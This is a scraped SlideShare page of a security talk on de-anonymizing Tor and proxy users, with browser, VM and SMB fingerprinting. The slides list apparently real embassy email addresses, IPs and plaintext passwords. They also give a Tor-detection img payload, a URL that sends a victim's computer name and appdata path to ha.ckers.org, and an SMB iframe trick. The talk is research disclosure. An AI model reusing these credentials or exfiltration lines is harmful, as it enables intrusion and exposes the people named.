SlideShare a Scribd company logo
1 of 25
1 Your logo here…
About Us ,[object Object]
SecTheory LLC - CEO
http://www.sectheory.com
http://ha.ckers.org – the lab
http://sla.ckers.org – the forum
Joshua “Jabra”Abraham
Rapid7 LLC - Security Researcher
http://www.rapid7.com
http://blog.spl0it.org2
De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee.  It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection  (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows  Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser  Metasploit exploit
BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”

More Related Content

Viewers also liked

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies ppQuest
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!rriddick2
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803City of Manvel
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU OptionsCity of Manvel
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010Quest
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 

Viewers also liked (19)

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies pp
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU Options
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - English
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Presentacion Rss
Presentacion RssPresentacion Rss
Presentacion Rss
 

Similar to Unmasking You

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for ActivistsGreg Stromire
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityAshley Zimmerman
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityJFashant
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineJinger Jarrett
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Networkthowell
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafetyteachesict
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security Austin Stroud
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdfhmooodes115
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter Cyber Security
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyAEGILITY
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Programdavidcurriecia
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterIT-oLogy
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingaleoscon2007
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pestspeterhitch
 

Similar to Unmasking You (20)

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for Activists
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Network
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafety
 
Security Primer
Security PrimerSecurity Primer
Security Primer
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdf
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdf
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World Safety
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim Salter
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingale
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pests
 

Recently uploaded

Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptx
Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptxGo for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptx
Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptxRakhi Bazaar
 
Driving Business Impact for PMs with Jon Harmer
Driving Business Impact for PMs with Jon HarmerDriving Business Impact for PMs with Jon Harmer
Driving Business Impact for PMs with Jon HarmerAggregage
 
Traction part 2 - EOS Model JAX Bridges.
Traction part 2 - EOS Model JAX Bridges.Traction part 2 - EOS Model JAX Bridges.
Traction part 2 - EOS Model JAX Bridges.Anamaria Contreras
 
WSMM Media and Entertainment Feb_March_Final.pdf
WSMM Media and Entertainment Feb_March_Final.pdfWSMM Media and Entertainment Feb_March_Final.pdf
WSMM Media and Entertainment Feb_March_Final.pdfJamesConcepcion7
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?Olivia Kresic
 
Introducing the Analogic framework for business planning applications
Introducing the Analogic framework for business planning applicationsIntroducing the Analogic framework for business planning applications
Introducing the Analogic framework for business planning applicationsKnowledgeSeed
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03DallasHaselhorst
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdfShaun Heinrichs
 
EUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersEUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersPeter Horsten
 
Darshan Hiranandani [News About Next CEO].pdf
Darshan Hiranandani [News About Next CEO].pdfDarshan Hiranandani [News About Next CEO].pdf
Darshan Hiranandani [News About Next CEO].pdfShashank Mehta
 
Supercharge Your eCommerce Stores-acowebs
Supercharge Your eCommerce Stores-acowebsSupercharge Your eCommerce Stores-acowebs
Supercharge Your eCommerce Stores-acowebsGOKUL JS
 
Kenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith PereraKenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith Pereraictsugar
 
Guide Complete Set of Residential Architectural Drawings PDF
Guide Complete Set of Residential Architectural Drawings PDFGuide Complete Set of Residential Architectural Drawings PDF
Guide Complete Set of Residential Architectural Drawings PDFChandresh Chudasama
 
Buy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy Verified Accounts
 
Technical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamTechnical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamArik Fletcher
 
Welding Electrode Making Machine By Deccan Dynamics
Welding Electrode Making Machine By Deccan DynamicsWelding Electrode Making Machine By Deccan Dynamics
Welding Electrode Making Machine By Deccan DynamicsIndiaMART InterMESH Limited
 
Entrepreneurship lessons in Philippines
Entrepreneurship lessons in  PhilippinesEntrepreneurship lessons in  Philippines
Entrepreneurship lessons in PhilippinesDavidSamuel525586
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdfShaun Heinrichs
 

Recently uploaded (20)

Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptx
Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptxGo for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptx
Go for Rakhi Bazaar and Pick the Latest Bhaiya Bhabhi Rakhi.pptx
 
Driving Business Impact for PMs with Jon Harmer
Driving Business Impact for PMs with Jon HarmerDriving Business Impact for PMs with Jon Harmer
Driving Business Impact for PMs with Jon Harmer
 
Traction part 2 - EOS Model JAX Bridges.
Traction part 2 - EOS Model JAX Bridges.Traction part 2 - EOS Model JAX Bridges.
Traction part 2 - EOS Model JAX Bridges.
 
WSMM Media and Entertainment Feb_March_Final.pdf
WSMM Media and Entertainment Feb_March_Final.pdfWSMM Media and Entertainment Feb_March_Final.pdf
WSMM Media and Entertainment Feb_March_Final.pdf
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?
 
Introducing the Analogic framework for business planning applications
Introducing the Analogic framework for business planning applicationsIntroducing the Analogic framework for business planning applications
Introducing the Analogic framework for business planning applications
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf
 
EUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersEUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exporters
 
Darshan Hiranandani [News About Next CEO].pdf
Darshan Hiranandani [News About Next CEO].pdfDarshan Hiranandani [News About Next CEO].pdf
Darshan Hiranandani [News About Next CEO].pdf
 
Supercharge Your eCommerce Stores-acowebs
Supercharge Your eCommerce Stores-acowebsSupercharge Your eCommerce Stores-acowebs
Supercharge Your eCommerce Stores-acowebs
 
Kenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith PereraKenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith Perera
 
Guide Complete Set of Residential Architectural Drawings PDF
Guide Complete Set of Residential Architectural Drawings PDFGuide Complete Set of Residential Architectural Drawings PDF
Guide Complete Set of Residential Architectural Drawings PDF
 
Buy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail Accounts
 
Technical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamTechnical Leaders - Working with the Management Team
Technical Leaders - Working with the Management Team
 
Welding Electrode Making Machine By Deccan Dynamics
Welding Electrode Making Machine By Deccan DynamicsWelding Electrode Making Machine By Deccan Dynamics
Welding Electrode Making Machine By Deccan Dynamics
 
The Bizz Quiz-E-Summit-E-Cell-IITPatna.pptx
The Bizz Quiz-E-Summit-E-Cell-IITPatna.pptxThe Bizz Quiz-E-Summit-E-Cell-IITPatna.pptx
The Bizz Quiz-E-Summit-E-Cell-IITPatna.pptx
 
Entrepreneurship lessons in Philippines
Entrepreneurship lessons in  PhilippinesEntrepreneurship lessons in  Philippines
Entrepreneurship lessons in Philippines
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf
 
Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)
 

Unmasking You

  • 1. 1 Your logo here…
  • 2.
  • 8. Rapid7 LLC - Security Researcher
  • 11. De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee. It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
  • 12. Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
  • 13. Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
  • 14. Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
  • 15. How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
  • 16. Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
  • 17. Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
  • 18. Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
  • 19. Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
  • 20. Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
  • 21. Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
  • 22. Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser Metasploit exploit
  • 23. BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
  • 24. Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
  • 25. File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”
  • 26. Usernames and Computer Names! 18 But seriously – that’s just terrible, let’s just get the username and computer name directly! Cut and paste http://ha.ckers.org/log.cgi?rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz SMB <iframesrc="file:///2.2.2.2amp;quot;> </iframe>
  • 27. SMBenum 19 SMB enum only finds certain types of files and only if known prior to testing SMB enum could also gather usernames through brute force Usernames + res:// timing could gather programs that smbenum alone couldn’t
  • 33.
  • 36.
  • 39. Final version of Slides and Demos

Editor's Notes

  1. Jabra (maybe need a picture)
  2. Jabra and time check
  3. Robert & Jabra says Google is big brother